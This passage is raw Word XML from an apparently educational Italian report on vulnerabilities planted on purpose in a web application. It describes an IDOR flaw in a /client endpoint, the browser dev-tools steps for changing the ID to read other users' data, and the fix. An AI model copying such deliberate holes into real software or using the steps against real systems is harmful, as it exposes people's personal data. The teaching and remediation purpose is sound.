    <w:p w14:paraId="632AD650" w14:textId="77777777" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="160F03FC" w14:textId="5181DFA4" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>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2410A8E3" w14:textId="77777777" w:rsidR="00250F61" w:rsidRPr="00250F61" w:rsidRDefault="002666AE" w:rsidP="00467BBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250F61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fix: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7BF25A" w14:textId="3154FC33" w:rsidR="00D03FA6" w:rsidRDefault="00250F61" w:rsidP="00467BBC">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t>bbiamo sostituito</w:t>
      </w:r>
      <w:r w:rsidR="002666AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C11A4">
        <w:t xml:space="preserve">il controllo tramite </w:t>
      </w:r>
      <w:r w:rsidR="002666AE">
        <w:t>regex con un normale controllo sulla password</w:t>
      </w:r>
      <w:r w:rsidR="00D95D77">
        <w:t xml:space="preserve">, usando il metodo includes() di JavaScript. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4080AB12" w14:textId="1160B57D" w:rsidR="00DE7E9C" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251993088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68DEAFB2" wp14:editId="465D6A80">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>349250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6423660" cy="649023"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="71721887"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3660" cy="649023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F15C86" w14:textId="3A86D987" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="18D66BAC" w14:textId="346B5AD9" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FE52DC3" w14:textId="461F2BD7" w:rsidR="00D03FA6" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251893760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0728DBCB" wp14:editId="34E1B01F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5560695" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="419696535" name="Casella di testo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6163ADA" w14:textId="6C62C773"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70</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: SignUp.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DBCB" id="_x0000_s1097" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:7.25pt;width:437.8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FKGwIAAEA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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="26163ADA" w14:textId="6C62C773"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>70</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: SignUp.jsx</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AF7D1" w14:textId="3CA97607" w:rsidR="002666AE" w:rsidRDefault="002666AE" w:rsidP="00467BBC"/>
    <w:p w14:paraId="35061678" w14:textId="6AC930F5" w:rsidR="00273E57" w:rsidRDefault="00273E57" w:rsidP="00273E57"/>
    <w:p w14:paraId="7E4D74B7" w14:textId="708EE578" w:rsidR="00BC247B" w:rsidRPr="00273E57" w:rsidRDefault="00BC247B" w:rsidP="00273E57">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nsecure </w:t>
      </w:r>
      <w:r w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">irect </w:t>
      </w:r>
      <w:r w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">bject </w:t>
      </w:r>
      <w:r w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00631FB1" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eferences (IDOR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FFF181" w14:textId="354B49D2" w:rsidR="00273E57" w:rsidRDefault="00273E57" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>File: UserController.java, UserDataService.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0900346A" w14:textId="4A86D143" w:rsidR="00273E57" w:rsidRDefault="00273E57" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Riga: 199 di UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C796C9" w14:textId="6BA912E5" w:rsidR="00FA683C" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Questa vulnerabilità nasce quando l’utente può accedere o modificare gli oggetti manipolando l’</w:t>
      </w:r>
      <w:r w:rsidR="00273E57" w:rsidRPr="00845CA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,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603B353B" w:rsidR="00BC247B" w:rsidRDefault="00FA683C" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo esempio</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> è stato modificato il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00BC247B" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/client</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00273E57">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00273E57" w:rsidRPr="00273E57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r w:rsidR="00273E57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t xml:space="preserve">(Figura </w:t>
      </w:r>
      <w:r w:rsidR="0060328E">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve">che prima </w:t>
      </w:r>
      <w:r w:rsidR="00273E57">
        <w:t>effettuava la ricerca</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> per username e ora </w:t>
      </w:r>
      <w:r w:rsidR="00273E57">
        <w:t>viene fatta</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:r w:rsidR="00273E57">
        <w:t xml:space="preserve">ID </w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve">in modo tale che modificando l’ID con il successivo </w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t>si possano</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B">
        <w:t xml:space="preserve"> ottenere i dati di un altro utente.</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t xml:space="preserve"> È stata adeguata anche la GET lato frontend che fa uso dell’ID come parametro, come visibile in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>71</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558E834" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRPr="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845CA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DADFC0" w14:textId="7D93AE4B" w:rsidR="005E7293" w:rsidRPr="00BC247B" w:rsidRDefault="0060328E" w:rsidP="00BC247B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251994112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0443A273" wp14:editId="26023978">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>851535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5486400" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1962854162"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pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t xml:space="preserve">Dopo l’autenticazione, dal web developer tools bisogna andare nella sezione network e aprire la </w:t>
      </w:r>
      <w:r w:rsidR="00845CA0" w:rsidRPr="00845CA0">
        <w:t xml:space="preserve">richiesta </w:t>
      </w:r>
      <w:r w:rsidR="00845CA0" w:rsidRPr="00845CA0">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>client?id=1</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0" w:rsidRPr="00845CA0">
        <w:t xml:space="preserve"> e, tramite Edit e Resend, si può modificare l’ID da inviare in rete per accedere alle informazioni degli altri utenti</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t xml:space="preserve">, come mostrato in Figura </w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC247B" w:rsidRPr="00845CA0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8E9DF" w14:textId="466784F9" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3DD26C10" w14:textId="18BEC694" w:rsidR="00DE7E9C" w:rsidRDefault="00845CA0" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251895808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66CCE2FE" wp14:editId="51AAB35B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>579755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3088005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4960620" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1069546455" name="Casella di testo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6039041" w14:textId="46AEA15B"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1</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E2FE" id="_x0000_s1098" type="#_x0000_t202" style="position:absolute;margin-left:45.65pt;margin-top:243.15pt;width:390.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MJ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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="26039041" w14:textId="46AEA15B"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1</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserDataService.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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563A528E" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="49156F43" w14:textId="4C7C17A1" w:rsidR="005E7293" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251995136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63D7FE99" wp14:editId="0C384085">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7269480" cy="831059"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="492381795"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69480" cy="831059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00845CA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251897856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12F3EEFF" wp14:editId="65D3546C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-468630</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1149985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7057390" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="132291850" name="Casella di testo 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571CEFD2" w14:textId="7E09D794"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EEFF" id="_x0000_s1099" type="#_x0000_t202" style="position:absolute;margin-left:-36.9pt;margin-top:90.55pt;width:555.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7b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5vp9e380/kkuS7mV/H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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="571CEFD2" w14:textId="7E09D794"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2</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B2CBA" w14:textId="4FE9840F" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1AB186CD" w14:textId="3A08ED7D" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6D0C3B38" w14:textId="05786FD0" w:rsidR="005E7293" w:rsidRDefault="00845CA0" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251899904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78662599" wp14:editId="73D99E9C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-540385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1165225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7195820" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="69529230" name="Casella di testo 1"/>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62A982E2" w14:textId="6B8B8447"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3</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: Accesso ai dati degli altr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2599" id="_x0000_s1100" type="#_x0000_t202" style="position:absolute;margin-left:-42.55pt;margin-top:91.75pt;width:56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D8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j7NPVzZxcknzX769i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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="62A982E2" w14:textId="6B8B8447"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3</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Accesso ai dati degli altri utenti</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A9A2F16" wp14:editId="3C7A931D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-549910</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4992377C" w14:textId="387ED0CD" w:rsidR="005E7293" w:rsidRDefault="005E7293" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2AE3750A" w14:textId="0E8CC84B" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73E53840" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2C48B657" w14:textId="77777777" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="699EDE18" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="006C2D8D" w:rsidP="00467BBC">
      <w:r w:rsidRPr="00845CA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197C124" w14:textId="195AE360" w:rsidR="005E7293" w:rsidRDefault="00845CA0" w:rsidP="00467BBC">
      <w:r>
        <w:t xml:space="preserve">Per il fix basta riutilizzare la </w:t>
      </w:r>
      <w:r w:rsidR="006C2D8D">
        <w:t xml:space="preserve">versione originale dove la </w:t>
      </w:r>
      <w:r w:rsidR="00350E38">
        <w:t>GET viene</w:t>
      </w:r>
      <w:r w:rsidR="006C2D8D">
        <w:t xml:space="preserve"> fatta per username e non per </w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidR="006C2D8D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF9DCA" w14:textId="4ED18961" w:rsidR="005E7293" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251996160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="732D21E1" wp14:editId="57902E38">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>48260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4899025" cy="3518916"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapNone/>
            <wp:docPr id="133982987"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025" cy="3518916"/>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22A5BE95" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="45133DFF" w14:textId="34FB968C" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="021C06EC" w14:textId="5B084691" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6FB3B579" w14:textId="3F55B623" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1EEFC41B" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7942093F" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="705C460D" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="39DEF384" w14:textId="77777777" w:rsidR="00845CA0" w:rsidRDefault="00845CA0" w:rsidP="00467BBC"/>
    <w:p w14:paraId="7BA4859D" w14:textId="3B5FEE84" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="45B270E3" w14:textId="2A320E50" w:rsidR="0060328E" w:rsidRDefault="0060328E" w:rsidP="00467BBC"/>
    <w:p w14:paraId="100EB642" w14:textId="1E7100FD" w:rsidR="0060328E" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251901952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76B50740" wp14:editId="703FAD45">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4057015" cy="635"/>
                <wp:effectExtent l="0" t="0" r="635" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="119497900" name="Casella di testo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4A282241" w14:textId="26B42036"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4</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40" id="_x0000_s1101" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:9.2pt;width:319.45pt;height:.05pt;z-index:25190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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4A282241" w14:textId="26B42036"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4</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserDataService.js</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD61E42" w14:textId="48E21572" w:rsidR="0060328E" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251997184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F00F671" wp14:editId="245D8252">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>365760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6788189" cy="876808"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="110226950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8189" cy="876808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A3A0C" w14:textId="51123827" w:rsidR="00350E38" w:rsidRDefault="00350E38" w:rsidP="00467BBC"/>
    <w:p w14:paraId="720CFBDC" w14:textId="0F611263" w:rsidR="00D03FA6" w:rsidRDefault="00D03FA6" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1FE5C372" w14:textId="43010044" w:rsidR="00350E38" w:rsidRDefault="0060328E" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
